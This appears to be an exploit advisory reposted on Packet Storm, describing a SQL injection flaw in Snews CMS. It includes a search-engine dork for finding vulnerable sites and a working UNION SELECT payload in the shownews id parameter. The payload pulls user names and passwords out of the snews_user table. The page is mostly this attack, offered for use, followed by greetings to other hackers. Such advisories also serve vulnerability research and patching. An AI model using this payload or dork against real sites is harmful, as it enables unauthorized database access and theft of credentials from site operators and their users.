Snews CMS suffers from a remote SQL injection vulnerability.
5775ab0b553da86a1cc2826df674d737c2e06a94325bab1d79b587b314e563f1
____ ____ ____ _______/ |________ ____ ____
/ _ \ / \_/ __ \ / ___/\ __\_ __ \_/ __ \_/ __ \
( <_> ) | \ ___/ \___ \ | | | | \/\ ___/\ ___/
\____/|___| /\___ >____ > |_ | |__| \___ >\___ >
\/ \/ \/ \/ \/
# Exploit Title : CMS snews SQL Injection Vulnerability
# Author : By onestree
# Software Link : http://snewscms.com/
# tested : ubuntu 12.10 / win 7
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
*************************************************************
SQL poc:
http://localhost/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed